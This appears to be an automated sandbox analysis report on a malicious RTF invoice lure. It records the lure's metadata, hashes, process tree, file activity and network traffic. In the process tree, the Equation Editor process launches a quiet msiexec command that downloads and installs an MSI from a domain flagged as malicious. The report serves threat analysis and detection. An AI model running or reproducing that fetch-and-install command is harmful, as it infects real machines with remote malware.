File name: | Prepayment over due invoices.doc |
Full analysis: | https://app.any.run/tasks/4d86793a-5242-4078-93c0-87482ed34afa |
Verdict: | Malicious activity |
Analysis date: | May 20, 2019, 11:07:10 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | text/rtf |
File info: | Rich Text Format data, version 1, unknown character set |
MD5: | E357623D1AFC047C1918550FC12F53E1 |
SHA1: | 7331B69AF184A55EF002487CDAFCFE7B408B300E |
SHA256: | 38A7E7FF4692537127100742D620E58F5CD84631688636CC9E097F05287BD211 |
SSDEEP: | 6144:IrlgcO1MPO48ns4EVSuAvg0p8444k444D444k444D444k444D444A447444s44M8:IXeMG8B0pjKbkl7Q2 |
.rtf | | | Rich Text Format (100) |
---|
Title: | Microsoft Research License Agreement |
---|---|
Author: | aphillip |
LastModifiedBy: | ARIELHACKZ |
CreateDate: | 2007:01:18 20:22:00 |
ModifyDate: | 2019:04:16 11:26:00 |
RevisionNumber: | 3 |
TotalEditTime: | 1 minute |
Pages: | 1 |
Words: | - |
Characters: | 1 |
Company: | Microsoft Corporation |
CharactersWithSpaces: | 1 |
InternalVersionNumber: | 49247 |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
456 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\Prepayment over due invoices.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
3716 | "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding | C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | svchost.exe | |
User: admin Company: Design Science, Inc. Integrity Level: MEDIUM Description: Microsoft Equation Editor Exit code: 0 Version: 00110900 | ||||
312 | cmd.exe & /C CD C: & msiexec.exe /i http://myfreeshopping.in/engine1/normalinvoice.msi /quiet | C:\Windows\system32\cmd.exe | — | EQNEDT32.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 1619 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2748 | msiexec.exe /i http://myfreeshopping.in/engine1/normalinvoice.msi /quiet | C:\Windows\system32\msiexec.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows® installer Exit code: 1619 Version: 5.0.7600.16385 (win7_rtm.090713-1255) | ||||
4008 | C:\Windows\system32\msiexec.exe /V | C:\Windows\system32\msiexec.exe | services.exe | |
User: SYSTEM Company: Microsoft Corporation Integrity Level: SYSTEM Description: Windows® installer Version: 5.0.7600.16385 (win7_rtm.090713-1255) |
PID | Process | Filename | Type | |
---|---|---|---|---|
456 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR1044.tmp.cvr | — | |
MD5:— | SHA256:— | |||
456 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:AAE1F34939203117AC1F4B1DA330748D | SHA256:A8522EFD13191ED100712611DBB7B818993A3A9AEE4584A1360605C4D2C4BD74 | |||
456 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~$epayment over due invoices.doc | pgc | |
MD5:D04EA7FF52094A4010984D65E344976E | SHA256:57A51407832E29D8E820A857DDCA01D0C5566E366769C547E15594CB9AB18D28 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
4008 | msiexec.exe | GET | 404 | 208.91.198.131:80 | http://myfreeshopping.in/engine1/normalinvoice.msi | US | html | 272 b | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
4008 | msiexec.exe | 208.91.198.131:80 | myfreeshopping.in | PDR | US | malicious |
Domain | IP | Reputation |
---|---|---|
myfreeshopping.in |
| malicious |
PID | Process | Class | Message |
---|---|---|---|
4008 | msiexec.exe | Potential Corporate Privacy Violation | SUSPICIOUS [PTsecurity] Executable application_x-msi Download |